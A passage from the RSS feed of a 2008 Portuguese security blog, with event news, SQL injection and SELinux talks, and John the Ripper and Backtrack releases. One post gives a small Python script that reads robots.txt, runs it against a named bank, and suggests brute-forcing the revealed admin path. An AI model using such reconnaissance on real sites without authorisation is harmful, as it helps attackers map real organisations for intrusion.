<p><strong>Lucius Curado, Fernando Ike, Eduardo Neves(eth0), Guto Carvalho(El Mariño), Eriberto, Lincoln, Felipe &#8220;FAW&#8221; (meu sponsor no Debian uhuu), Hugo Corbucci (meu irmão quaker), o &#8220;magrelo&#8221; do João Cosme, Maddog &#8220;O Mark Shuttleworth de 2040&#8243;***</strong><strong>, entre outros!</strong></p>
<p>Abaixo nota oficial emitida pelos organizadores do evento:</p>
<p>&#8220;<em>Abertas as inscrições para o evento Internacional de Software Livre na Capital Federal. Á partir de hoje, dia 26/08, estão abertas as inscrições da 3ª Edição do Festival software Livre – DF. Os candidados poderão inscrever-se e participar da realização do evento, nos dias 3 e 4 de outubro, reunindo profissionais e adeptos do Software Livre (SL) com interesse no aprendizado e disseminação da cultura SL. Este será realizado pela Associação de Tecnologias Abertas – ATA, UCB e SERPRO, e organizado pela Training Tecnologia.</em></p>
<p><em>Com a expectativa de mais de 2000 participantes, o evento ocorrerá na Universidade Católica de Brasília. Estarão presentes lideranças de Software Livre do Governo Federal, comunidades, professores, pesquisadores e estudantes de diversas áreas; empresários, profissionais e técnicos do setor. O evento contará com a apresentação de palestras, tutoriais, cases de sucesso, oficinas práticas, maratona de Java e brinquedoteca, jogos em software livre, etc. Aproveite esta oportunidade com os melhores e interaja* *com a comunidade de Software Livre em esfera nacional interessada em seu desenvolvimento e de código aberto, para o compartilhamento de experiências e conhecimento.</em></p>
<p><em>Estes são alguns dos palestrantes já confirmados: Jon Maddog (Boston - LPI), Leandro Monk (Argentina &#8211; GCOOP), Rodrigo Padula (FEDORA), Fernando Anselmo (POLITEC/DFJUG), Sandro Melo (4NIX), Fernando Boaglio, Jomar Silva (ODF Alliance Chapter Brasil), João Eriberto (FORTIUM), Felipe Wiel (DEBIAN), Razgriz, Paulo Maia (GPJO – Caixa), Marcelo D&#8217;Elia Branco (Projeto Software Livre Brasil), entre outros. A taxa única cobrada para participação nos dois dias do evento é de R$ 50,00(cinqüenta reais ). Confira a programação no site www.festivalsoftwarelivre.org ou acesse o </em><a href="http://www.festivalsoftwarelivre.org/evento/index.php?option=com_palestra" target="_blank"><em>link</em></a><em> e faça a sua inscrição. Você não pode perder essa&#8230;</em>&#8220;</p>
<p>É isso ae espero todos lá!!!</p>
<p>[]&#8217;s</p>
<p>Quem perdeu isso na Debconf, vale a pena conferir o video do bom velinho:</p>
<p>[1] <a href="http://www.youtube.com/watch?v=CYztkEcvsCc" target="_blank">http://www.youtube.com/watch?v=CYztkEcvsCc</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/51/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/51/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/51/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=51&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/09/03/palestra-aprovada/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Palestras, mergulhos e inatividade</title>
		<link>http://ulissescastro.wordpress.com/2008/08/18/pelstras-mergulhos-e-inatividade/</link>
		<comments>http://ulissescastro.wordpress.com/2008/08/18/pelstras-mergulhos-e-inatividade/#comments</comments>
		<pubDate>Mon, 18 Aug 2008 19:02:43 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Announce]]></category>
		<category><![CDATA[Conference]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SELinux]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=43</guid>
		<description><![CDATA[AAAAh! Muuuuito tempo sem blogar!  :-(
Preciso atualizar o blog com mais algumas palestras que ministrei neste tempo que estive sem blogar e também pedir desculpas as pessoas que me enviaram e-mail e acabei não  respondendo. (principalmente sobre informações sobre a certificação CEH)
Me empolguei nos &#8220;mergulhos&#8221; em pesquisas para aperfeiçoar minhas habilidades ninja (eheheh) [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=43&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>AAAAh! Muuuuito tempo sem blogar!  :-(</p>
<p>Preciso atualizar o blog com mais algumas palestras que ministrei neste tempo que estive sem blogar e também pedir desculpas as pessoas que me enviaram e-mail e acabei não  respondendo. (principalmente sobre informações sobre a certificação CEH)</p>
<p>Me empolguei nos &#8220;mergulhos&#8221; em pesquisas para aperfeiçoar minhas habilidades ninja (eheheh) em desenvolvimento em C, ataques de SQL injection, virtualização e claro tentando acompanhar a lista de e-mail frenética do SE Linux e projetos relacionados.</p>
<p>No dia 24/07 estive no SERPRO como palestrante &#8220;<a href="http://www.midstorm.org/~fike/weblog/2008/07/28/slides-das-palestras-tecnicas-realizadas-no-serpro/" target="_blank">surpresa</a>&#8221; e falando sobre ataques de injeção SQL, hardening em banco de dados e boas práticas de desenvolvimento, foi um bate papo rápido de aproximadamente 30 minutos falando sobre o assunto com desenvolvedores e DBA&#8217;s. A infra-estrutura do SERPRO é excelente e achei muito interessante o sistema de video conferência que rolou entre as filiais de todo o Brasil. A palestra está disponível para download <a href="http://ulissescastro.files.wordpress.com/2008/08/sql_injection_apresentacao.pdf">aqui</a>.</p>
<p>No dia 16/08 participei como palestrante no <a href="http://efosl.fortium.com.br/1_efosl_dia_d_2008/index.php">1o. Encontro Fortium de Software Livre e Dia D 2008</a> evento organizado pela Faculdade Fortium em conjunto com <a href="http://www.eriberto.pro.br/wiki/index.php?title=Usuário:Eriberto" target="_blank">João Eriberto Mota Filho</a>. Neste evento que estive com <a href="http://efosl.fortium.com.br/1_efosl_dia_d_2008/grade.html">duas</a> palestras aprovadas, falei primeiramente sobre como funcionam os ataques de SQL injection e o que fazer para diminuir a probabilidade de sofrer um ataque como este, e logo após, a palestra de Security Enhanced Linux com conceitos de DAC, MAC, LSM e claro SE Linux.</p>
<p><a href="http://ulissescastro.files.wordpress.com/2008/08/proteja-se_ataques_de_injecao_sql001-001.png"><img class="alignnone size-medium wp-image-46" src="http://ulissescastro.files.wordpress.com/2008/08/proteja-se_ataques_de_injecao_sql001-001.png?w=300&#038;h=224" alt="" width="300" height="224" /></a></p>
<p>A palestra de Ataques de Injeção de SQL pode ser baixada <a href="http://ulissescastro.files.wordpress.com/2008/08/proteja-se_ataques_de_injecao_sql_efosl.pdf">aqui</a>.</p>
<p><a href="http://ulissescastro.files.wordpress.com/2008/08/entendendo_nsa_security_enhanced_linux_efosl001-001.png"><img class="alignnone size-medium wp-image-47" src="http://ulissescastro.files.wordpress.com/2008/08/entendendo_nsa_security_enhanced_linux_efosl001-001.png?w=300&#038;h=224" alt="" width="300" height="224" /></a></p>
<p>E a de Security Enhanced Linux <a href="http://ulissescastro.files.wordpress.com/2008/08/entendendo_nsa_security_enhanced_linux_efosl.pdf">aqui</a>.</p>
<p>Agradeço a todos que compareceram e espero vê-los nas próximas! ;-)</p>
<p>Ah! Espero agora sobrar um tempo para voltar a ativa aqui e blogar mais frequentemente.</p>
<p>Abraços!</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/43/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/43/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/43/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/43/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/43/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=43&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/08/18/pelstras-mergulhos-e-inatividade/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2008/08/proteja-se_ataques_de_injecao_sql001-001.png?w=300" medium="image" />

		<media:content url="http://ulissescastro.files.wordpress.com/2008/08/entendendo_nsa_security_enhanced_linux_efosl001-001.png?w=300" medium="image" />
	</item>
		<item>
		<title>Novo John The Ripper 1.7.3.1 Released!</title>
		<link>http://ulissescastro.wordpress.com/2008/07/21/novo-john-the-ripper-1731-released/</link>
		<comments>http://ulissescastro.wordpress.com/2008/07/21/novo-john-the-ripper-1731-released/#comments</comments>
		<pubDate>Mon, 21 Jul 2008 21:22:03 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=36</guid>
		<description><![CDATA[O bom e velho John The Ripper deu as caras novamente!
Para quem não conhece John é uma ferramenta criada com o intuito de auditar senhas, mas claro, como &#8220;quase&#8221; todas as ferramentas de segurança acaba funcionando como um martelo! (martelo?) Isso mesmo, explicando, a analogia no caso é pelo fato que com um martelo podemos [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=36&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>O bom e velho John The Ripper deu as caras novamente!</p>
<p>Para quem não conhece John é uma ferramenta criada com o intuito de auditar senhas, mas claro, como &#8220;quase&#8221; todas as ferramentas de segurança acaba funcionando como um martelo! (martelo?) Isso mesmo, explicando, a analogia no caso é pelo fato que com um martelo podemos tanto martelar um prego na parede (coisa útil para pendurar quadros, etc&#8230;) ou matar uma pessoa com uma martelada na cara! :-o</p>
<p>Em um pentest usamos para testar se as senhas utilizadas são senhas consideradas &#8220;fracas&#8221; tanto em windows como linux/unix, olhando por outro lado, em um ataque onde o invasor/cracker que de alguma forma consegue acesso aos arquivos que contém senhas (passwd,shadow/sam) ele normalmente o utiliza para descobrir as senhas fracas, elevar privilégios, ganhar acesso a compartihamentos em outras máquinas, etc&#8230; ;-)</p>
<p>Após um longo período sem atualização ontem (20/07/2008) foi lançada uma nova versão abaixo listo parte relevante do Changelog.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p><em>The following changes have been made between <strong>John 1.7.3</strong> and <strong>1.7.3.1</strong>:<br />
</em></p>
<p><em>* Corrected the x86 assembly files for building on Mac OS X.<br />
</em></p>
<p><em>* Merged in some generic changes from JtR Pro.</em></p>
<p><em><br />
</em></p>
<p><em>The following changes have been made between John <strong>1.7.2</strong> and <strong>1.7.3</strong>:</em></p>
<p><em><br />
</em></p>
<p><em>* Two Blowfish-based crypt(3) hashes may now be computed in parallel for much</em></p>
<p><em>better performance on modern multi-issue CPUs with a sufficient number of</em></p>
<p><em>registers (e.g., x86-64).</em></p>
<p><em>* Bitslice DES assembly code for x86-64 has been converted to use</em></p>
<p><em>instruction pointer relative addressing (needed for Mac OS X support).</em></p>
<p><em>* New make targets: macosx-universal, macosx-x86-64, solaris-x86-64-cc,</em></p>
<p><em>solaris-x86-64-gcc, solaris-x86-sse2-cc, solaris-x86-sse2-gcc,</em></p>
<p><em>solaris-x86-mmx-cc, solaris-x86-mmx-gcc, solaris-x86-any-cc, linux-ia64;</em></p>
<p><em>other changes to the Makefile.</em></p>
<p><em>* Minor bug fixes.</em></p>
<p><em>* &#8220;DumbForce&#8221; and &#8220;KnownForce&#8221; external mode samples have been added to the</em></p>
<p><em>default john.conf.</em></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Mais algumas informações e funcionalidades podem ser vistas no site do meu brother Anderson.[2] </p>
<p><strong>Enjoy!</strong> ;-)</p>
<p> </p>
<p>Referências:</p>
<p>Site official: <a href="http://www.openwall.com/john/">http://www.openwall.com/john/</a></p>
<p>2 - <a href="http://y2h4ck.wordpress.com/2008/04/18/john-the-ripper-more-ciphers/" target="_blank">http://y2h4ck.wordpress.com/2008/04/18/john-the-ripper-more-ciphers/</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/36/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/36/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/36/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/36/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/36/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=36&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/07/21/novo-john-the-ripper-1731-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Backtrack 3 Versão Final disponível para download</title>
		<link>http://ulissescastro.wordpress.com/2008/06/20/backtrack-3-versao-final-disponivel-para-download/</link>
		<comments>http://ulissescastro.wordpress.com/2008/06/20/backtrack-3-versao-final-disponivel-para-download/#comments</comments>
		<pubDate>Fri, 20 Jun 2008 19:45:35 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/2008/06/20/backtrack-3-versao-final-disponivel-para-download/</guid>
		<description><![CDATA[É isso ae! Saiu a versão final, e dessa vez a novidade que além da imagem para CD e USB disponibilizaram uma imagem de VMware.
O download pode ser feito aqui.
Em posts anteriores comentei um pouco sobre o Bracktrack e sua versão de pré-lançamento feita através do canal IRC.
Enjoy&#8230;  :)

       [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=35&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>É isso ae! Saiu a versão final, e dessa vez a novidade que além da imagem para CD e USB disponibilizaram uma imagem de VMware.</p>
<p>O download pode ser feito <a href="http://remote-exploit.org/backtrack_download.html">aqui</a>.</p>
<p>Em posts <a href="http://ulissescastro.wordpress.com/2008/06/10/saiu-backtrack-3-pre-final-irc-version/">anteriores</a> comentei um pouco sobre o Bracktrack e sua versão de pré-lançamento feita através do canal IRC.</p>
<p>E<strong>njoy&#8230;  :)</strong><strong></p>
<p></strong></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/35/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/35/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/35/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=35&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/06/20/backtrack-3-versao-final-disponivel-para-download/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>&#8220;Data Mining&#8221; e o ingênuo Robots.txt</title>
		<link>http://ulissescastro.wordpress.com/2008/06/15/data-mining-e-o-ingenuo-robotstxt/</link>
		<comments>http://ulissescastro.wordpress.com/2008/06/15/data-mining-e-o-ingenuo-robotstxt/#comments</comments>
		<pubDate>Sun, 15 Jun 2008 06:00:22 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/2008/06/15/data-mining-e-o-ingenuo-robotstxt/</guid>
		<description><![CDATA[Em uma das primeias fases de um pentest precisamos coletar o máximo de informações sobre o alvo ao qual atacar para entender sobre o que estou dizendo e ganhar tempo colo abaixo um trecho direto do wikipedia&#8230;
&#34;Data mining is the process of sorting through large amounts of data and picking out relevant information.&#34; [1]
Com este [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=33&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Em uma das primeias fases de um pentest precisamos coletar o máximo de informações sobre o alvo ao qual atacar para entender sobre o que estou dizendo e ganhar tempo colo abaixo um trecho direto do wikipedia&#8230;</p>
<p>&quot;<strong><em>Data mining is the process of sorting through large amounts of data and picking out relevant information.</em></strong>&quot; [1]</p>
<p>Com este conceito em mente, venho escrever um simples passo para coletar passivamente dados de um determinado alvo e somar na fase de &quot;<em>Passively Information Gathering</em>&quot; de um pentest.</p>
<p>falando que o uso do robots.txt é pra ser usado para AUXILIAR as engines de busca a filtrar o conteudo que vai ser indexado pra aumentar a relevancia dos resultados, e não pra esconder as coisas que nao podem ser vistas&#8230;.</p>
<p><strong>Robots.txt</strong> (<em>Robots Exclusion Standard</em>), arquivo texto que fica na raiz de um website para <strong>auxiliar</strong> os &quot;<a href="http://en.wikipedia.org/wiki/Web_spider"><em><strong>web spiders</strong></em></a>&quot; a filtrar o conteúdo que vai ser indexado para os sites de busca (google, yahoo, etc..) e aumentar a relevância dos resultados. *</p>
<p>Como exemplo prático, seu site tem uma área restrita com informações sobre parceiros <strong>http://www.seusite.com.br/parceiros</strong> e você não quer que o conteúdo desta área seja indexado pelos sites de busca pois possui informações sensíveis sobre parceiros de sua empresa, você criaria um Robots.txt na raiz do seu site como abaixo:</p>
<p>User-Agent: *<br />Disallow: /parceiros</p>
<p>Certo, legal bem bacana, mas uma coisa importante que temos que lembrar, este arquivo nunca deve ser utilizado como medida de seguraça para esconder diretórios importantes pois este arquivo tem permissão de acesso ao mundo para ser lido! Abaixo um sript bem simples escrito em python que baixa e imprime na tela o conteúdo deste arquivo.</p>
<p>#vi robots.py</p>
<p>Conteúdo:<br />&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />#!/usr/bin/python</p>
<p>import urllib, sys</p>
<p>try :<br />        robotsFile = urllib.urlopen(&quot;http://&quot; + sys.argv[1] + &quot;/robots.txt&quot;)<br />        print robotsFile.read()<br />except:<br />        print &quot;Error fetching Robots.txt file !&quot;<br />&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Então para olhar o conteúdo do arquivo Robots.txt (se ele existir) e descobrir quais diretórios o site não quer que seja indexado pelos robôs de busca, basta executar:</p>
<p>#./robots.py &lt;www.site.com&gt;</p>
<p>Exemplo:</p>
<p>./robots.py www.bancofibra.com.br</p>
<p>User-agent: *<br />Disallow: /admin/<br />Disallow: /engine/<br />Disallow: /db/<br />Disallow: /media/</p>
<p>Com as informações obtidas, temos uma lista de possíveis diretórios que podem ter informações sensíveis, é possível encontrar interfaces de administração, diretórios de parceiros, desenvolvimento, teste&#8230;  muita informação que <strong>não</strong> deveria ficar exposta em um arquivo que tem leitura por qualquer um.</p>
<p>No exemplo acima a interface de administração &quot;<strong>Disallow: /admin/</strong>&quot; está aparecendo e <strong>NÃO</strong> deveria estar aberta pois com esta informação sei que existe uma interface de administração e posso usar o acesso e preparar um ataque de força bruta para conseguir o acesso a esta interface.</p>
<p><strong>NUNCA</strong> coloque neste arquivo diretórios que possam demonstrar informações sensíveis ou lugares onde não quer que acessem, um ótimo artigo sobre Robots.txt pode ser encontrado <a href="http://securitytube.net/Analyzing-Robots.txt-for-Fun-and-Profit-video.aspx">aqui</a> e uma boa referência de como criar arquivos Robots.txt corretamente por ser visto <a href="http://www.outfront.net/tutorials_02/adv_tech/robots.htm">aqui</a>.</p>
<p>Uma outra forma utilizando o wget para simular um User-Agent pode ser encontrada <a href="http://y2h4ck.wordpress.com/2008/04/11/enumeration-webroot/">aqui</a>.</p>
<p>Amplexos e até o próximo! ;-)</p>
<p>Referências</p>
<p>[1] &#8211; <a href="http://en.wikipedia.org/wiki/Data_mining">http://en.wikipedia.org/wiki/Data_mining</a></p>
<p><em>* Modificado o conceito sobre robots.txt para ficar mais claro o entendimento. Todos os créditos ao Rafael(stiod) por melhorar o conceito de Robots! (valeu Rafa, meu amigo da cidade onde chove ácido! o.O)<br /></em></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/33/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/33/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/33/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=33&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/06/15/data-mining-e-o-ingenuo-robotstxt/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Saiu!! Backtrack 3 &#8211; Pre-Final IRC Version</title>
		<link>http://ulissescastro.wordpress.com/2008/06/10/saiu-backtrack-3-pre-final-irc-version/</link>
		<comments>http://ulissescastro.wordpress.com/2008/06/10/saiu-backtrack-3-pre-final-irc-version/#comments</comments>
		<pubDate>Tue, 10 Jun 2008 17:48:22 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/2008/06/10/saiu-backtrack-3-pre-final-irc-version/</guid>
		<description><![CDATA[Backtrack[1] é uma distribuição Linux live baseada em uma outra distribuição Linux live chamada Slax[2] que por sua vez é baseada em Slackware e criada utilizando LinuxLive[3], que são scripts para criar distribuições Linux live (putz!)

Bom como ela é criada não vem muito ao caso, o interessante desta distribuição live é seu foco em teste [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=31&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Backtrack[1] é uma distribuição Linux live baseada em uma outra distribuição Linux live chamada Slax[2] que por sua vez é baseada em Slackware e criada utilizando LinuxLive[3], que são scripts para criar distribuições Linux live (putz!)</p>
<p><img height="263" style="margin:5px;" width="420" alt="" src="http://ulissescastro.files.wordpress.com/2008/06/bt3prefinal.png?w=420&#038;h=263" /></p>
<p>Bom como ela é criada não vem muito ao caso, o interessante desta distribuição live é seu foco em <strong>teste de intrusão </strong>(<em>pentest</em>) onde bastando inicilizar à partir de um CD ou Pen drive temos um ambiente completo com inúmeras ferramentas de segurança para realização de<strong> testes de intrusão</strong> (<em>pentest</em>), o que espanta bastante é seu kernel bem preparado para reconhecer diversos tipos de hardware e a facilidade para personalização através de módulos.</p>
<p>Uma lista de ferramentas disponíveis no Backtrack pode ser visto <a href="http://wiki.remote-exploit.org/index.php/Tools">aqui.</a></p>
<p>Caso não exista alguma ferramenta que esteja acostumado a utilizar recomendo fortemente a leitura de como personalizá-la no Wiki[4], utilizando-a em um Pen drive a capacidade de modularização aumenta significativamente pois podemos personalizá-la sem ter que gravar outro CD.</p>
<p>A última versão (Backtrack 3 Beta) foi lançada em 14-12-2007 e desde então o trabalho em aperfeiçoar e arrumar os bugs foram iniciados. Hoje 10-06-2008 foi lançado no IRC a versão <strong>BT3 Pre-Final</strong>, que logo será substituída pela <strong>Final</strong> para quem se interessar em testar e reportar alguns bugs, segue o link para download:</p>
<p><a href="http://cracker.offensive-security.com/bt3-irc-prerelease.iso">http://cracker.offensive-security.com/bt3-irc-prerelease.iso</a></p>
<p>Abraços!</p>
<p>Referências:</p>
